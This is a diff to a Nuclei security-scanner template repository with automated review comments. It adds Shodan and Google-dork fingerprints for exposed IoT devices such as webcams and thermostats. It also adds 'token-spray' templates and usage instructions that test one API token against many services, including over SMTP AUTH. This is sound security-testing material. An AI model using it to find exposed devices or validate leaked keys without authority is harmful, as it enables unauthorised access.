- '{{BaseURL}}/#'
matchers-condition: and
matchers:
- type: word
words:
- '<title>EnvisionGateway</title>'
- type: status
status:
- 200

@ -0,0 +1,24 @@
id: heatmiser-wifi-thermostat
info:
name: Heatmiser Wifi Thermostat
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7445
tags: iot
metadata:
shodan: 'http.title:"Heatmiser Wifi Thermostat"'
requests:
- method: GET
path:
- '{{BaseURL}}/index.htm'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Heatmiser Wifi Thermostat</title>'
- type: status
status:
- 200

iot/webcamxp-5.yaml Normal file
@ -0,0 +1,24 @@
id: webcamxp-5
info:
name: webcamXP 5
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7448
tags: iot
metadata:
shodan: 'http.title:"webcamXP 5"'
requests:
- method: GET
path:
- '{{BaseURL}}/home.html'
matchers-condition: and
matchers:
- type: word
words:
- '<title>webcamXP 5</title>'
- type: status
status:
- 200

@ -14,6 +14,7 @@ requests:
Host: {{Hostname}}
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
threads: 50
payloads:
path:
- /
@ -63,9 +64,6 @@ requests:
- /webticket/webticketservice.svcabs/
- /adfs/services/trust/2005/windowstransport
attack: sniper
threads: 50
matchers-condition: and
matchers:
- type: dsl

@ -16,6 +16,7 @@ requests:
- '{{BaseURL}}/gallery/zp-core/setup/index.php'
- '{{BaseURL}}/zp-core/setup/index.php'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

@ -0,0 +1,24 @@
id: detect-jabber-xmpp
info:
name: Detects Jabber XMPP Instance
author: geeknik
severity: info
description: Jabber is the original name of the Extensible Messaging and Presence Protocol (XMPP), the open technology for instant messaging and presence.
reference: https://datatracker.ietf.org/doc/html/rfc6120
tags: network,jabber,xmpp
network:
- inputs:
- data: "a\n"
host:
- "{{Hostname}}"
- "{{Hostname}}:5222"
matchers:
- type: word
words:
- "stream:stream xmlns:stream"
- "stream:error xmlns:stream"
condition: or
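Review bot: the probe `a\n` is not a valid stream opening, so a compliant server replies with a `stream:error` rather than a `stream:stream` header; the two-word `or` matcher covers both, but a comment saying so would stop a later contributor from "fixing" the input. The `host:` list only tries the bare input and port 5222 (client-to-server); RFC 6120, the reference given, also registers 5269 for server-to-server, so adding `"{{Hostname}}:5269"` would catch s2s-only deployments.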

@ -5,6 +5,8 @@ info:
author: pikpikcu,philippedelteil
severity: info
tags: tech,aviatrix
metadata:
shodan-query: http.title:"AviatrixController", http.title:"Aviatrix Cloud Controller"
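Review bot: this uses `shodan-query:` under `metadata:`, whereas the other templates touched in this commit use `shodan:` (alienVault-usm, exsi-system, sql-monitor, codian-mcu-login). Pick one key, since tooling that reads metadata for dorks will miss the other. Two queries joined by a comma in one string are also ambiguous; a YAML list would be clearer.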
requests:
- method: GET

@ -18,7 +18,7 @@ requests:
- contains(tolower(all_headers), 'x-amz-bucket')
- contains(tolower(all_headers), 'x-amz-request')
- contains(tolower(all_headers), 'x-amz-id')
- contains(tolower(all_headers), 'AmazonS3')
- contains(tolower(all_headers), 'amazons3')
part: header
condition: or
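Review bot: correct fix: `tolower(all_headers)` can never contain the mixed-case literal `AmazonS3`, so the fourth DSL clause was dead code and the bucket check relied on the three `x-amz-*` clauses alone; with `amazons3` a `Server: AmazonS3` header now counts, as intended. The same class of bug is worth grepping for across the repository: any `contains(tolower(...), '...')` whose literal contains uppercase letters.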

@ -1,15 +1,19 @@
## About
This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
## Usage
You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
```bash
# Run Nuclei specifying all the api templates:
token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest
```console
# Running token-spray templates against a single token to test
nuclei -t token-spray/ -var token=random-token-to-test
# Running token-spray templates against a file containing multiple new line delimited tokens
nuclei -t token-spray/ -var token=file_with_tokens.txt
```
## Credits
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
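Review bot: the new Usage sentence will be read by every user of the directory and has grammar slips: `token-spray are **self-contained** template and does not requires URLs as input` should be `token-spray templates are **self-contained** and do not require URLs as input`, and `token/s` reads better as `token(s)`. The two Credits paragraphs at the end are identical here, so that part of the hunk is presumably a whitespace-only change; harmless, but it inflates the diff. Dropping the `-u null` workaround from the examples is correct now that the templates carry `self-contained: true`.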

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,asana
self-contained: true
requests:
- method: GET
path:
@ -16,6 +17,6 @@ requests:
matchers:
- type: status
negative: true
status:
- 401
negative: true
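Review bot: moving `negative: true` above `status:` is cosmetic, but the matcher logic deserves attention while this hunk is being touched: a single negative status matcher on `401` matches every response that is not 401, so a 403 from a scoped token, a 429 from rate limiting or a 5xx during an outage all report the token as valid. Suggest a positive check (`status: - 200`, optionally combined under `matchers-condition: and` with a body word the authenticated response is known to contain) so that only a genuinely accepted token produces a result.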

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,bing,maps,bingmaps
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,bitly
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,buildkite
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,buttercms
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,calendly
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,circle,circleci
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,deviantart
self-contained: true
requests:
- method: POST
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,dropbox
self-contained: true
requests:
- method: POST
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,github
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,autocomplete
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,directions
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,elevation
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,fcm,firebase,cloud,messaging
self-contained: true
requests:
- method: POST
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,find,text
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,distance,matrix
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,geocode
self-contained: true
requests:
- method: GET
path:

View File

@ -6,19 +6,21 @@ info:
severity: info
tags: token-spray,google,geolocation
self-contained: true
requests:
- method: GET
path:
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
matchers-condition: and
matchers-condition: and
matchers:
- type: word
part: body
negative: true
words:
- 'error'
negative: true
- type: status
negative: true
status:
- 404
negative: true
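Review bot: the `matchers-condition: and` line appears both as removed and added, so this part of the hunk looks like an indentation-only change; fine, but worth confirming the key still sits at the request level and not inside `matchers`. The more important point is that both matchers in this template are negative: any response that is not a 404 and whose body does not contain the substring `error` is reported as a hit, which includes 403, 429 and 5xx responses with a differently worded body. Suggest replacing the `404` negative status with a positive `status: - 200` and keeping the body word check as the second condition.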

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps,embed
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps,embed
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search,nearby
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,roads
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,place,details
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,places,photo
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,playable,locations
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,route
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,speed,limit
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,streetview
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,timezone
self-contained: true
requests:
- method: GET
path:

View File

@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search,places,text
self-contained: true
requests:
- method: GET
path:
@ -14,6 +15,6 @@ requests:
matchers:
- type: word
part: body
negative: true
words:
- 'error_message'
negative: true
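Review bot: this template has a single negative word matcher on `error_message` and no status check at all, so any non-200 response whose body happens not to contain that string (rate limiting, a blocked key, an HTML error page) will be reported as a valid token. Suggest adding a `type: status` matcher for `200` and setting `matchers-condition: and` so both must hold.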

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,heroku
self-contained: true
requests:
- method: POST
path:
@ -17,9 +18,9 @@ requests:
matchers:
- type: status
condition: or
status:
- 200
- 201
- 202
- 206
condition: or
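Review bot: `condition: or` is the default for matchers, and for a `status` matcher an `and` over several codes could never match a single response anyway, so the line can simply be dropped rather than moved. Separately, four success codes are accepted here but the body is never inspected; if the endpoint returns 200 for an unauthenticated request with an error body, this would produce a false positive, so a body or status combination that only an accepted token yields would be stronger.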

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,hubspot
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,instagram,graph
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,ipstack
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,iterable
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,jumpcloud
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,lokalise
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,loqate
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mailchimp
self-contained: true
network:
- inputs:
- data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"
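Review bot: the `AUTH PLAIN` payload encodes `\0apikey\0<token>`, i.e. an empty authorization identity, the username `apikey` and the token as the password, which is the correct SASL PLAIN layout. However, PLAIN only base64-encodes the secret, it does not protect it, so this input must only be sent after the session is protected by TLS (implicit TLS port or after a successful STARTTLS). The visible hunk does not show the host or any TLS handling for this network request; please confirm the token is not being sent over a cleartext SMTP session.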

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mailgun
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mapbox
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,newrelic,nerdgraph
self-contained: true
requests:
- method: POST
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,node,npm,package,manager
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,weather,openweather
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pagerduty
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pendo
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pivotaltracker
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,postmark
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,sendgrid
self-contained: true
network:
- inputs:
- data: "ehlo\r\n"
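Review bot: the first input is a bare `ehlo\r\n`. RFC 5321 requires a domain or address-literal argument on EHLO, and a number of MTAs reply 501 to an EHLO without one, which would abort the exchange before the credential is ever tested. Suggest `EHLO <some-hostname>\r\n` (any syntactically valid hostname will do). As with the other SMTP-based template, confirm the credential exchange that follows happens over TLS.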

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,slack
self-contained: true
requests:
- method: POST
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,sonarcloud
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,spotify
self-contained: true
requests:
- method: GET
path:

View File

@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,square
self-contained: true
requests:
- method: GET
path:

Some files were not shown because too many files have changed in this diff.